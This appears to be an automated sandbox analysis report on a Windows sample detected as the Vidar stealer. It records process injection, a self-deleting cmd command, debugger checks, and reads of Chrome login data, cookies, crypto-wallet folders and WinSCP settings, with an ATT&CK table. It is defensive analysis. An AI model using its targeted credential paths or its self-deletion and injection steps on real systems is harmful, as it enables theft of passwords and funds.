Source: 82668342394913559298137947.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00417648 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,

2_2_00417648

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4656:120:WilError_01

Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll	0_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAlloc	2_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: VirtualAllocEx	2_2_00E81730
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll	2_2_00E81730

Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00428945 push ecx; ret		2_2_00428958
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004236AF push ecx; ret		2_2_004236C2

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,

2_2_0041A5D9

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

2_2_0041A5D9

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 3636

Thread sleep count: 49 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00416CDA __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo,

2_2_00416CDA

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_0040C3ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00412548
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,	2_2_004135E2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	2_2_00409DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00411603
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_0040D624
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	2_2_00417F60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_004118D3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset,	2_2_00409284
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	2_2_004132B0

Source: C:\Users\user\Desktop\file.exe

2_2_0040A392

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_2-23411

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH.u%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00E82BB6

Source: C:\Users\user\Desktop\file.exe

2_2_0041A5D9

Source: C:\Users\user\Desktop\file.exe

2_2_0040E905

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E82D4C SetUnhandledExceptionFilter,	0_2_00E82D4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00E8285E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042A39A SetUnhandledExceptionFilter,	2_2_0042A39A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041F69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041F69E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00426733 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00426733
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00E8285E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00E82D4C SetUnhandledExceptionFilter,	2_2_00E82D4C

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,	2_2_0041754C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0042C0D6
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	2_2_0042E927
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_0042C1CB
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_0042B9B9
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	2_2_0042C272
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	2_2_0042AA00
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0042EA01
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	2_2_00424A1C
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_0042C2CD
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_0042C49E
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_0042BCA7
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	2_2_00425CBB
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042C55E
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_0042AD5D
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042C5C5
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	2_2_0042C601

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E829D2 cpuid

0_2_00E829D2

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E82E39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00E82E39

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_004174A0 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

2_2_004174A0

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0041717C GetUserNameA,

2_2_0041717C

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: JaxxLiberty
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: Exodus Web3 Wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum"
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match	File source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	111 Process Injection	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	111 Process Injection	1 Credentials in Registry	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
